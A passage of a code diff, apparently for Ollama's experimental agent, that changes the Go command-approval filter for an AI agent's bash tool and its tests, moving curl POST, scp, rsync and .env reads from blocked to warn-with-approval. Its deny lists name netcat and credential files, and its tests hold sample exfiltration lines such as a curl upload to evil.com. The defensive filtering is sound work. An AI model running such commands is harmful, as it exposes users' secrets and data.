+Based on the experimental MLX backend, we're working on adding imagegen support.  After running the cmake commands above:
+
+```
+go build -o imagegen ./x/imagegen/cmd/engine
+```
--- a/x/agent/approval.go
+++ b/x/agent/approval.go
@@ -41,7 +41,6 @@ var optionLabels = []string{
 var toolDisplayNames = map[string]string{
 	"bash":       "Bash",
 	"web_search": "Web Search",
-	"web_fetch":  "Web Fetch",
 }

 // ToolDisplayName returns the human-readable display name for a tool.
@@ -71,9 +70,6 @@ var autoAllowCommands = map[string]bool{
 // autoAllowPrefixes are command prefixes that are always allowed.
 // These are read-only or commonly-needed development commands.
 var autoAllowPrefixes = []string{
-	// Git read-only
-	"git status", "git log", "git diff", "git branch", "git show",
-	"git remote -v", "git tag", "git stash list",
 	// Package managers - run scripts
 	"npm run", "npm test", "npm start",
 	"bun run", "bun test",
@@ -92,6 +88,9 @@ var autoAllowPrefixes = []string{
 }

 // denyPatterns are dangerous command patterns that are always blocked.
+// NOTE: Some network patterns (curl POST, scp, rsync) moved to warnPatterns
+// to allow user escalation with explicit approval.
+// These patterns use word boundary matching to avoid false positives (e.g., "nc " won't match "rsync").
 var denyPatterns = []string{
 	// Destructive commands
 	"rm -rf", "rm -fr",
@@ -102,19 +101,8 @@ var denyPatterns = []string{
 	"sudo ", "su ", "doas ",
 	"chmod 777", "chmod -R 777",
 	"chown ", "chgrp ",
-	// Network exfiltration
-	"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
-	"wget --post",
+	// Network tools (raw sockets - still blocked)
 	"nc ", "netcat ",
-	"scp ", "rsync ",
-	// History and credentials
-	"history",
-	".bash_history", ".zsh_history",
-	".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
-	".ssh/config",
-	".aws/credentials", ".aws/config",
-	".gnupg/",
-	"/etc/shadow", "/etc/passwd",
 	// Dangerous patterns
 	":(){ :|:& };:", // fork bomb
 	"chmod +s",      // setuid
@@ -122,11 +110,20 @@ var denyPatterns = []string{
 }

 // denyPathPatterns are file patterns that should never be accessed.
-// These are checked as exact filename matches or path suffixes.
+// These are checked using simple substring matching.
 var denyPathPatterns = []string{
-	".env",
-	".env.local",
-	".env.production",
+	// History files
+	"history",
+	".bash_history", ".zsh_history",
+	// SSH keys and config
+	".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
+	".ssh/config",
+	// Cloud credentials
+	".aws/credentials", ".aws/config",
+	".gnupg/",
+	// System credentials
+	"/etc/shadow", "/etc/passwd",
+	// Secrets files
 	"credentials.json",
 	"secrets.json",
 	"secrets.yaml",
@@ -135,6 +132,25 @@ var denyPathPatterns = []string{
 	".key",
 }

+// warnPatterns are patterns that require explicit approval with warning.
+// These are potentially risky but legitimate in some contexts.
+// Unlike denyPatterns, these show a warning but allow user approval.
+var warnPatterns = []string{
+	// Network operations (user may need for legitimate API testing)
+	"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
+	"wget --post",
+	// File transfer (user may need for deployments)
+	"scp ", "rsync ",
+}
+
+// warnPathPatterns are file patterns that require explicit approval with warning.
+// Unlike denyPathPatterns, these show a warning but allow user approval.
+var warnPathPatterns = []string{
+	".env",
+	".env.local",
+	".env.production",
+}
+
 // ApprovalManager manages tool execution approvals.
 type ApprovalManager struct {
 	allowlist map[string]bool // exact matches
@@ -177,7 +193,8 @@ func IsDenied(command string) (bool, string) {

 	// Check deny patterns
 	for _, pattern := range denyPatterns {
-		if strings.Contains(commandLower, strings.ToLower(pattern)) {
+		patternLower := strings.ToLower(pattern)
+		if containsWord(commandLower, patternLower) {
 			return true, pattern
 		}
 	}
@@ -192,6 +209,57 @@ func IsDenied(command string) (bool, string) {
 	return false, ""
 }

+// containsWord checks if a command contains a pattern as a word/command.
+// This handles patterns like "nc " which should match "nc -l 8080" but not "rsync -avz".
+// The pattern is considered a match if:
+// - It appears at the start of the command, OR
+// - It's preceded by a space, pipe, semicolon, or other delimiter
+func containsWord(command, pattern string) bool {
+	// Simple contains check first
+	if !strings.Contains(command, pattern) {
+		return false
+	}
+
+	// Check if pattern is at the start
+	if strings.HasPrefix(command, pattern) {
+		return true
+	}
+
+	// Check if pattern is preceded by a delimiter (space, pipe, semicolon, &, etc.)
+	delimiters := []string{" ", "|", ";", "&", "(", "`", "$"}
+	for _, delim := range delimiters {
+		if strings.Contains(command, delim+pattern) {
+			return true
+		}
+	}
+
+	return false
+}
+
+// IsWarn checks if a bash command matches warning patterns.
+// These are patterns that require explicit user approval with a warning,
+// but are not completely blocked like deny patterns.
+// Returns true and the matched pattern if it should warn.
+func IsWarn(command string) (bool, string) {
+	commandLower := strings.ToLower(command)
+
+	// Check warn patterns
+	for _, pattern := range warnPatterns {
+		if strings.Contains(commandLower, strings.ToLower(pattern)) {
+			return true, pattern
+		}
+	}
+
+	// Check warn path patterns
+	for _, pattern := range warnPathPatterns {
+		if strings.Contains(commandLower, strings.ToLower(pattern)) {
+			return true, pattern
+		}
+	}
+
+	return false, ""
+}
+
 // FormatDeniedResult returns the tool result message when a command is blocked.
 func FormatDeniedResult(command string, pattern string) string {
 	return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
@@ -199,6 +267,7 @@ func FormatDeniedResult(command string, pattern string) string {

 // extractBashPrefix extracts a prefix pattern from a bash command.
 // For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
+// For git commands like "git log x/agent/", returns "git log:x/agent/" (includes subcommand)
 // For commands without path args, returns empty string.
 // Paths with ".." traversal that escape the base directory return empty string for security.
 func extractBashPrefix(command string) string {
@@ -220,12 +289,30 @@ func extractBashPrefix(command string) string {
 		"less": true, "more": true, "file": true, "wc": true,
 		"grep": true, "find": true, "tree": true, "stat": true,
 		"sed": true,
+		"git": true, // git commands with path args (e.g., git log x/agent/)
 	}

 	if !safeCommands[baseCmd] {
 		return ""
 	}

+	// For git commands, extract the subcommand for more granular allowlisting
+	var subCmd string
+	if baseCmd == "git" && len(fields) >= 2 {
+		// Git subcommand is the second field (e.g., "log", "status", "diff")
+		// Skip options like "-v" - the first non-option argument is the subcommand
+		for _, arg := range fields[1:] {
+			if !strings.HasPrefix(arg, "-") {
+				subCmd = arg
+				break
+			}
+		}
+		// If no subcommand found (unlikely for git), use empty string
+		if subCmd == "" {
+			subCmd = "unknown"
+		}
+	}
+
 	// Find the first path-like argument (must contain / or \ or start with .)
 	// First pass: look for clear paths (containing path separators or starting with .)
 	for _, arg := range fields[1:] {
@@ -237,6 +324,10 @@ func extractBashPrefix(command string) string {
 		if isNumeric(arg) {
 			continue
 		}
+		// For git, skip the subcommand itself when looking for paths
+		if baseCmd == "git" && arg == subCmd {
+			continue
+		}
 		// Only process if it looks like a path (contains / or \ or starts with .)
 		if !strings.Contains(arg, "/") && !strings.Contains(arg, "\\") && !strings.HasPrefix(arg, ".") {
 			continue
@@ -278,6 +369,13 @@ func extractBashPrefix(command string) string {
 			dir = path.Dir(cleaned)
 		}

+		// Build prefix with subcommand for git, or just baseCmd for others
+		if baseCmd == "git" {
+			if dir == "." {
+				return fmt.Sprintf("git %s:./", subCmd)
+			}
+			return fmt.Sprintf("git %s:%s/", subCmd, dir)
+		}
 		if dir == "." {
 			return fmt.Sprintf("%s:./", baseCmd)
 		}
@@ -285,6 +383,7 @@ func extractBashPrefix(command string) string {
 	}

 	// Second pass: if no clear path found, use the first non-flag argument as a filename
+	// For git, we still allow ./ prefix even without path args (git status, git stash, etc.)
 	for _, arg := range fields[1:] {
 		if strings.HasPrefix(arg, "-") {
 			continue
@@ -292,6 +391,12 @@ func extractBashPrefix(command string) string {
 		if isNumeric(arg) {
 			continue
 		}
+		// For git, skip the subcommand when checking for path args
+		if baseCmd == "git" && arg == subCmd {
+			// Git commands without path args (git status, git stash, etc.)
+			// Still return a prefix with subcommand and current directory
+			return fmt.Sprintf("git %s:./", subCmd)
+		}
 		// Treat as filename in current dir
 		return fmt.Sprintf("%s:./", baseCmd)
 	}
@@ -495,24 +600,37 @@ func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any)
 	// This prevents buffered input from causing double-press issues
 	flushStdin(fd)

+	// Check if bash command should show warning
+	// Warning is shown for: commands outside cwd, or commands matching warn patterns
 	isWarning := false
 	var warningMsg string
 	var allowlistInfo string
 	if toolName == "bash" {
 		if cmd, ok := args["command"].(string); ok {
+			// Check for outside cwd warning
 			if isCommandOutsideCwd(cmd) {
 				isWarning = true
 				warningMsg = "command targets paths outside project"
 			}
-			if prefix := extractBashPrefix(cmd); prefix != "" {
+			// Check for warn patterns (curl POST, scp, rsync, .env files)
+			if warned, pattern := IsWarn(cmd); warned {
+				isWarning = true
+				warningMsg = fmt.Sprintf("matches warning pattern: %s", pattern)
+			}
+			// Generate allowlist info for display
+			prefix := extractBashPrefix(cmd)
+			if prefix != "" {
+				// Parse prefix format "cmd:path/" into command and directory
 				colonIdx := strings.Index(prefix, ":")
 				if colonIdx != -1 {
 					cmdName := prefix[:colonIdx]
 					dirPath := prefix[colonIdx+1:]
+					// Include "(includes subdirs)" for directories that allow hierarchical matching
+					// ./ is special - it only allows files in current dir, not subdirs
 					if dirPath != "./" {
-						allowlistInfo = fmt.Sprintf("%s in %s directory (includes subdirs)", cmdName, dirPath)
+						allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory (includes subdirs)", cmdName, dirPath)
 					} else {
-						allowlistInfo = fmt.Sprintf("%s in %s directory", cmdName, dirPath)
+						allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory", cmdName, dirPath)
 					}
 				}
 			}
@@ -566,16 +684,6 @@ func formatToolDisplay(toolName string, args map[string]any) string {
 		}
 	}

-	// For web fetch, show URL and internet notice
-	if toolName == "web_fetch" {
-		if url, ok := args["url"].(string); ok {
-			sb.WriteString(fmt.Sprintf("Tool: %s\n", displayName))
-			sb.WriteString(fmt.Sprintf("URL: %s\n", url))
-			sb.WriteString("Uses internet via ollama.com")
-			return sb.String()
-		}
-	}
-
 	// Generic display
 	sb.WriteString(fmt.Sprintf("Tool: %s", displayName))
 	if len(args) > 0 {
@@ -604,7 +712,7 @@ type selectorState struct {
 	denyReason     string // deny reason (always visible in box)
 	isWarning      bool   // true if command has warning
 	warningMessage string // dynamic warning message to display
-	allowlistInfo  string // show what will be allowlisted (for "Allow for this session" option)
+	allowlistInfo  string // show what will be allowlisted (for "Always allow" option)
 }

 // runSelector runs the interactive selector and returns the selected index and optional deny reason.
@@ -818,9 +926,11 @@ func renderSelectorBox(state *selectorState) {
 	// Blank line separator
 	fmt.Fprintf(os.Stderr, "\033[K\r\n")

+	// Draw options
 	for i, label := range optionLabels {
-		if i == 2 {
+		if i == 2 { // Deny option with input
 			denyLabel := "3. Deny: "
+			// Show placeholder if empty, actual input if typing
 			inputDisplay := state.denyReason
 			if inputDisplay == "" {
 				inputDisplay = "\033[90m(optional reason)\033[0m"
@@ -831,6 +941,7 @@ func renderSelectorBox(state *selectorState) {
 				fmt.Fprintf(os.Stderr, "  \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
 			}
 		} else {
+			// Show allowlist info beside "Allow for this session" (index 1)
 			displayLabel := label
 			if i == 1 && state.allowlistInfo != "" {
 				displayLabel = fmt.Sprintf("%s  \033[90m%s\033[0m", label, state.allowlistInfo)
@@ -866,8 +977,9 @@ func updateSelectorOptions(state *selectorState) {
 	linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
 	fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)

+	// Redraw options
 	for i, label := range optionLabels {
-		if i == 2 {
+		if i == 2 { // Deny option
 			denyLabel := "3. Deny: "
 			inputDisplay := state.denyReason
 			if inputDisplay == "" {
@@ -879,6 +991,7 @@ func updateSelectorOptions(state *selectorState) {
 				fmt.Fprintf(os.Stderr, "  \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
 			}
 		} else {
+			// Show allowlist info beside "Allow for this session" (index 1)
 			displayLabel := label
 			if i == 1 && state.allowlistInfo != "" {
 				displayLabel = fmt.Sprintf("%s  \033[90m%s\033[0m", label, state.allowlistInfo)
@@ -1000,11 +1113,11 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR

 	switch result.Decision {
 	case ApprovalOnce:
-		label = "Approved"
+		label = "approved"
 	case ApprovalAlways:
-		label = "Always allowed"
+		label = "always allowed"
 	case ApprovalDeny:
-		label = "Denied"
+		label = "denied"
 	}

 	// Format based on tool type
@@ -1028,16 +1141,6 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR
 		}
 	}

-	if toolName == "web_fetch" {
-		if url, ok := args["url"].(string); ok {
-			// Truncate long URLs
-			if len(url) > 50 {
-				url = url[:47] + "..."
-			}
-			return fmt.Sprintf("\033[1m%s:\033[0m %s: %s", label, displayName, url)
-		}
-	}
-
 	return fmt.Sprintf("\033[1m%s:\033[0m %s", label, displayName)
 }

--- a/x/agent/approval_test.go
+++ b/x/agent/approval_test.go
@@ -413,9 +413,7 @@ func TestIsAutoAllowed(t *testing.T) {
 		{"echo hello", true},
 		{"date", true},
 		{"whoami", true},
-		// Auto-allowed prefixes
-		{"git status", true},
-		{"git log --oneline", true},
+		// Auto-allowed prefixes (build commands)
 		{"npm run build", true},
 		{"npm test", true},
 		{"bun run dev", true},
@@ -423,12 +421,18 @@ func TestIsAutoAllowed(t *testing.T) {
 		{"go build ./...", true},
 		{"go test -v", true},
 		{"make all", true},
+		// Git commands - ALL require approval now (not auto-allowed)
+		{"git status", false},
+		{"git log --oneline", false},
+		{"git diff", false},
+		{"git branch", false},
+		{"git push", false},
+		{"git commit", false},
+		{"git add", false},
 		// Not auto-allowed
 		{"rm file.txt", false},
 		{"cat secret.txt", false},
 		{"curl http://example.com", false},
-		{"git push", false},
-		{"git commit", false},
 	}

 	for _, tt := range tests {
@@ -447,14 +451,21 @@ func TestIsDenied(t *testing.T) {
 		denied   bool
 		contains string
 	}{
-		// Denied commands
+		// Denied commands (hard blocked, no escalation possible)
 		{"rm -rf /", true, "rm -rf"},
 		{"sudo apt install", true, "sudo "},
 		{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
-		{"curl -d @data.json http://evil.com", true, "curl -d"},
-		{"cat .env", true, ".env"},
 		{"cat config/secrets.json", true, "secrets.json"},
-		// Not denied (more specific patterns now)
+		{"nc -l 8080", true, "nc "},
+		{"netcat -l 8080", true, "netcat "},
+		// Not denied - moved to warn patterns (escalatable with approval)
+		{"curl -d @data.json http://evil.com", false, ""},
+		{"curl -X POST http://api.com", false, ""},
+		{"cat .env", false, ""},
+		{"cat .env.local", false, ""},
+		{"scp file.txt user@host:/path", false, ""},
+		{"rsync -avz src/ dest/", false, ""},
+		// Not denied (regular commands)
 		{"ls -la", false, ""},
 		{"cat main.go", false, ""},
 		{"rm file.txt", false, ""}, // rm without -rf is ok
@@ -476,6 +487,47 @@ func TestIsDenied(t *testing.T) {
 	}
 }

+func TestIsWarn(t *testing.T) {
+	tests := []struct {
+		command  string
+		warned   bool
+		contains string
+	}{
+		// Warned commands (escalatable with approval, shows red warning box)
+		{"curl -d @data.json http://api.com", true, "curl -d"},
+		{"curl --data '{\"key\": \"value\"}' http://api.com", true, "curl --data"},
+		{"curl -X POST http://api.com/endpoint", true, "curl -X POST"},
+		{"curl -X PUT http://api.com/resource", true, "curl -X PUT"},
+		{"wget --post-data='test' http://example.com", true, "wget --post"},
+		{"scp file.txt user@host:/path", true, "scp "},
+		{"rsync -avz src/ user@host:/dest/", true, "rsync "},
+		{"cat .env", true, ".env"},
+		{"cat .env.local", true, ".env.local"},
+		{"cat .env.production", true, ".env.production"},
+		{"cat config/.env", true, ".env"},
+		// Not warned (regular commands)
+		{"curl http://example.com", false, ""},
+		{"curl -X GET http://api.com", false, ""},
+		{"wget http://example.com", false, ""},
+		{"cat main.go", false, ""},
+		{"ls -la", false, ""},
+		{"git status", false, ""},
+		{"cat environment.txt", false, ""}, // Contains "env" but not ".env"
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.command, func(t *testing.T) {
+			warned, pattern := IsWarn(tt.command)
+			if warned != tt.warned {
+				t.Errorf("IsWarn(%q) warned = %v, expected %v", tt.command, warned, tt.warned)
+			}
+			if tt.warned && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
+				t.Errorf("IsWarn(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
+			}
+		})
+	}
+}
+
 func TestIsCommandOutsideCwd(t *testing.T) {
 	tests := []struct {
 		name     string
--- a/x/cmd/run.go
+++ b/x/cmd/run.go
@@ -9,7 +9,6 @@ import (
 	"net/url"
 	"os"
 	"os/signal"
-	"slices"
 	"strings"
 	"syscall"
 	"time"
@@ -131,7 +130,6 @@ type RunOptions struct {
 	KeepAlive    *api.Duration
 	Think        *api.ThinkValue
 	HideThinking bool
-	Verbose      bool

 	// Agent fields (managed externally for session persistence)
 	Tools    *tools.Registry
@@ -180,7 +178,6 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 	var thinkTagClosed bool = false
 	var pendingToolCalls []api.ToolCall
 	var consecutiveErrors int // Track consecutive 500 errors for retry limit
-	var latest api.ChatResponse

 	role := "assistant"
 	messages := opts.Messages
@@ -190,7 +187,6 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 			p.StopAndClear()
 		}

-		latest = response
 		role = response.Message.Role
 		if response.Message.Thinking != "" && !opts.HideThinking {
 			if !thinkTagOpened {
@@ -368,11 +364,10 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 					}

 					// Check if command is auto-allowed (safe command)
-					// TODO(parthsareen): re-enable with tighter scoped allowlist
-					// if agent.IsAutoAllowed(cmd) {
-					// 	fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
-					// 	skipApproval = true
-					// }
+					if agent.IsAutoAllowed(cmd) {
+						fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
+						skipApproval = true
+					}
 				}
 			}

@@ -487,10 +482,6 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 		fmt.Println()
 	}

-	if opts.Verbose {
-		latest.Summary()
-	}
-
 	return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
 }

@@ -642,13 +633,12 @@ func checkModelCapabilities(ctx context.Context, modelName string) (supportsTool
 // GenerateInteractive runs an interactive agent session.
 // This is called from cmd.go when --experimental flag is set.
 // If yoloMode is true, all tool approvals are skipped.
-// If enableWebsearch is true, the web search tool is registered.
-func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration, yoloMode bool, enableWebsearch bool) error {
+func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration, yoloMode bool) error {
 	scanner, err := readline.New(readline.Prompt{
 		Prompt:         ">>> ",
 		AltPrompt:      "... ",
 		Placeholder:    "Send a message (/? for help)",
-		AltPlaceholder: "Press Enter to send",
+		AltPlaceholder: `Use """ to end multi-line input`,
 	})
 	if err != nil {
 		return err
@@ -668,28 +658,14 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 	var toolRegistry *tools.Registry
 	if supportsTools {
 		toolRegistry = tools.DefaultRegistry()
-
-		// Register web search and web fetch tools if enabled via flag
-		if enableWebsearch {
-			toolRegistry.RegisterWebSearch()
-			toolRegistry.RegisterWebFetch()
+		if toolRegistry.Count() > 0 {
+			fmt.Fprintf(os.Stderr, "\033[90mtools available: %s\033[0m\n", strings.Join(toolRegistry.Names(), ", "))
 		}
-
-		if toolRegistry.Has("bash") {
-			fmt.Fprintln(os.Stderr)
-			fmt.Fprintln(os.Stderr, "This experimental version of Ollama has the \033[1mbash\033[0m tool enabled.")
-			fmt.Fprintln(os.Stderr, "Models can read files on your computer, or run commands (after you allow them).")
-			fmt.Fprintln(os.Stderr)
-		}
-
-		if toolRegistry.Has("web_search") || toolRegistry.Has("web_fetch") {
-			fmt.Fprintln(os.Stderr, "The \033[1mWeb Search\033[0m and \033[1mWeb Fetch\033[0m tools are enabled. Models can search and fetch web content via ollama.com.")
-			fmt.Fprintln(os.Stderr)
-		}
-
 		if yoloMode {
 			fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m yolo mode - all tool approvals will be skipped\n")
 		}
+	} else {
+		fmt.Fprintf(os.Stderr, "\033[1mnote:\033[0m model does not support tools - running in chat-only mode\n")
 	}

 	// Create approval manager for session
@@ -697,8 +673,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op

 	var messages []api.Message
 	var sb strings.Builder
-	var format string
-	var system string

 	for {
 		line, err := scanner.Readline()
@@ -710,7 +684,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			if line == "" {
 				fmt.Println("\nUse Ctrl + d or /bye to exit.")
 			}
-			scanner.Prompt.UseAlt = false
 			sb.Reset()
 			continue
 		case err != nil:
@@ -730,10 +703,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			continue
 		case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
 			fmt.Fprintln(os.Stderr, "Available Commands:")
-			fmt.Fprintln(os.Stderr, "  /set            Set session variables")
-			fmt.Fprintln(os.Stderr, "  /show           Show model information")
-			fmt.Fprintln(os.Stderr, "  /load           Load a different model")
-			fmt.Fprintln(os.Stderr, "  /save           Save session as a model")
 			fmt.Fprintln(os.Stderr, "  /tools          Show available tools and approvals")
 			fmt.Fprintln(os.Stderr, "  /clear          Clear session context and approvals")
 			fmt.Fprintln(os.Stderr, "  /bye            Exit")
@@ -743,280 +712,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			fmt.Fprintln(os.Stderr, "  Ctrl+O          Expand last tool output")
 			fmt.Fprintln(os.Stderr, "")
 			continue
-		case strings.HasPrefix(line, "/set"):
-			args := strings.Fields(line)
-			if len(args) > 1 {
-				switch args[1] {
-				case "history":
-					scanner.HistoryEnable()
-				case "nohistory":
-					scanner.HistoryDisable()
-				case "wordwrap":
-					wordWrap = true
-					fmt.Println("Set 'wordwrap' mode.")
-				case "nowordwrap":
-					wordWrap = false
-					fmt.Println("Set 'nowordwrap' mode.")
-				case "verbose":
-					if err := cmd.Flags().Set("verbose", "true"); err != nil {
-						return err
-					}
-					fmt.Println("Set 'verbose' mode.")
-				case "quiet":
-					if err := cmd.Flags().Set("verbose", "false"); err != nil {
-						return err
-					}
-					fmt.Println("Set 'quiet' mode.")
-				case "think":
-					thinkValue := api.ThinkValue{Value: true}
-					var maybeLevel string
-					if len(args) > 2 {
-						maybeLevel = args[2]
-					}
-					if maybeLevel != "" {
-						thinkValue.Value = maybeLevel
-					}
-					think = &thinkValue
-					// Check if model supports thinking
-					if client, err := api.ClientFromEnvironment(); err == nil {
-						if resp, err := client.Show(cmd.Context(), &api.ShowRequest{Model: modelName}); err == nil {
-							if !slices.Contains(resp.Capabilities, model.CapabilityThinking) {
-								fmt.Fprintf(os.Stderr, "warning: model %q does not support thinking output\n", modelName)
-							}
-						}
-					}
-					if maybeLevel != "" {
-						fmt.Printf("Set 'think' mode to '%s'.\n", maybeLevel)
-					} else {
-						fmt.Println("Set 'think' mode.")
-					}
-				case "nothink":
-					think = &api.ThinkValue{Value: false}
-					// Check if model supports thinking
-					if client, err := api.ClientFromEnvironment(); err == nil {
-						if resp, err := client.Show(cmd.Context(), &api.ShowRequest{Model: modelName}); err == nil {
-							if !slices.Contains(resp.Capabilities, model.CapabilityThinking) {
-								fmt.Fprintf(os.Stderr, "warning: model %q does not support thinking output\n", modelName)
-							}
-						}
-					}
-					fmt.Println("Set 'nothink' mode.")
-				case "format":
-					if len(args) < 3 || args[2] != "json" {
-						fmt.Println("Invalid or missing format. For 'json' mode use '/set format json'")
-					} else {
-						format = args[2]
-						fmt.Printf("Set format to '%s' mode.\n", args[2])
-					}
-				case "noformat":
-					format = ""
-					fmt.Println("Disabled format.")
-				case "parameter":
-					if len(args) < 4 {
-						fmt.Println("Usage: /set parameter <name> <value>")
-						continue
-					}
-					params := args[3:]
-					fp, err := api.FormatParams(map[string][]string{args[2]: params})
-					if err != nil {
-						fmt.Printf("Couldn't set parameter: %q\n", err)
-						continue
-					}
-					fmt.Printf("Set parameter '%s' to '%s'\n", args[2], strings.Join(params, ", "))
-					options[args[2]] = fp[args[2]]
-				case "system":
-					if len(args) < 3 {
-						fmt.Println("Usage: /set system <message>")
-						continue
-					}
-
-					system = strings.Join(args[2:], " ")
-					newMessage := api.Message{Role: "system", Content: system}
-					if len(messages) > 0 && messages[len(messages)-1].Role == "system" {
-						messages[len(messages)-1] = newMessage
-					} else {
-						messages = append(messages, newMessage)
-					}
-					fmt.Println("Set system message.")
-					continue
-				default:
-					fmt.Printf("Unknown command '/set %s'. Type /? for help\n", args[1])
-				}
-			} else {
-				fmt.Println("Usage: /set <parameter|system|history|format|wordwrap|think|verbose> [value]")
-			}
-			continue
-		case strings.HasPrefix(line, "/show"):
-			args := strings.Fields(line)
-			if len(args) > 1 {
-				client, err := api.ClientFromEnvironment()
-				if err != nil {
-					fmt.Println("error: couldn't connect to ollama server")
-					continue
-				}
-				req := &api.ShowRequest{
-					Name:    modelName,
-					Options: options,
-				}
-				resp, err := client.Show(cmd.Context(), req)
-				if err != nil {
-					fmt.Println("error: couldn't get model")
-					continue
-				}
-
-				switch args[1] {
-				case "info":
-					fmt.Fprintf(os.Stderr, "  Model\n")
-					fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Name", modelName)
-					if resp.Details.Family != "" {
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Family", resp.Details.Family)
-					}
-					if resp.Details.ParameterSize != "" {
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Parameter Size", resp.Details.ParameterSize)
-					}
-					if resp.Details.QuantizationLevel != "" {
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Quantization", resp.Details.QuantizationLevel)
-					}
-					if len(resp.Capabilities) > 0 {
-						caps := make([]string, len(resp.Capabilities))
-						for i, c := range resp.Capabilities {
-							caps[i] = string(c)
-						}
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Capabilities", strings.Join(caps, ", "))
-					}
-					fmt.Fprintln(os.Stderr)
-				case "license":
-					if resp.License == "" {
-						fmt.Println("No license was specified for this model.")
-					} else {
-						fmt.Println(resp.License)
-					}
-				case "modelfile":
-					fmt.Println(resp.Modelfile)
-				case "parameters":
-					fmt.Println("Model defined parameters:")
-					if resp.Parameters == "" {
-						fmt.Println("  No additional parameters were specified.")
-					} else {
-						for _, l := range strings.Split(resp.Parameters, "\n") {
-							fmt.Printf("  %s\n", l)
-						}
-					}
-					if len(options) > 0 {
-						fmt.Println("\nUser defined parameters:")
-						for k, v := range options {
-							fmt.Printf("  %-30s %v\n", k, v)
-						}
-					}
-				case "system":
-					switch {
-					case system != "":
-						fmt.Println(system + "\n")
-					case resp.System != "":
-						fmt.Println(resp.System + "\n")
-					default:
-						fmt.Println("No system message was specified for this model.")
-					}
-				case "template":
-					if resp.Template != "" {
-						fmt.Println(resp.Template)
-					} else {
-						fmt.Println("No prompt template was specified for this model.")
-					}
-				default:
-					fmt.Printf("Unknown command '/show %s'. Type /? for help\n", args[1])
-				}
-			} else {
-				fmt.Println("Usage: /show <info|license|modelfile|parameters|system|template>")
-			}
-			continue
-		case strings.HasPrefix(line, "/load"):
-			args := strings.Fields(line)
-			if len(args) != 2 {
-				fmt.Println("Usage: /load <modelname>")
-				continue
-			}
-			newModelName := args[1]
-			fmt.Printf("Loading model '%s'\n", newModelName)
-
-			// Create progress spinner
-			p := progress.NewProgress(os.Stderr)
-			spinner := progress.NewSpinner("")
-			p.Add("", spinner)
-
-			// Get client
-			client, err := api.ClientFromEnvironment()
-			if err != nil {
-				p.StopAndClear()
-				fmt.Println("error: couldn't connect to ollama server")
-				continue
-			}
-
-			// Check if model exists and get its info
-			info, err := client.Show(cmd.Context(), &api.ShowRequest{Model: newModelName})
-			if err != nil {
-				p.StopAndClear()
-				if strings.Contains(err.Error(), "not found") {
-					fmt.Printf("Couldn't find model '%s'\n", newModelName)
-				} else {
-					fmt.Printf("error: %v\n", err)
-				}
-				continue
-			}
-
-			// For cloud models, no need to preload
-			if info.RemoteHost == "" {
-				// Preload the model by sending an empty generate request
-				req := &api.GenerateRequest{
-					Model: newModelName,
-					Think: think,
-				}
-				err = client.Generate(cmd.Context(), req, func(r api.GenerateResponse) error {
-					return nil
-				})
-				if err != nil {
-					p.StopAndClear()
-					if strings.Contains(err.Error(), "not found") {
-						fmt.Printf("Couldn't find model '%s'\n", newModelName)
-					} else if strings.Contains(err.Error(), "does not support thinking") {
-						fmt.Printf("error: %v\n", err)
-					} else {
-						fmt.Printf("error loading model: %v\n", err)
-					}
-					continue
-				}
-			}
-
-			p.StopAndClear()
-			modelName = newModelName
-			messages = []api.Message{}
-			approval.Reset()
-			continue
-		case strings.HasPrefix(line, "/save"):
-			args := strings.Fields(line)
-			if len(args) != 2 {
-				fmt.Println("Usage: /save <modelname>")
-				continue
-			}
-			client, err := api.ClientFromEnvironment()
-			if err != nil {
-				fmt.Println("error: couldn't connect to ollama server")
-				continue
-			}
-			req := &api.CreateRequest{
-				Model:      args[1],
-				From:       modelName,
-				Parameters: options,
-				Messages:   messages,
-			}
-			fn := func(resp api.ProgressResponse) error { return nil }
-			err = client.Create(cmd.Context(), req, fn)
-			if err != nil {
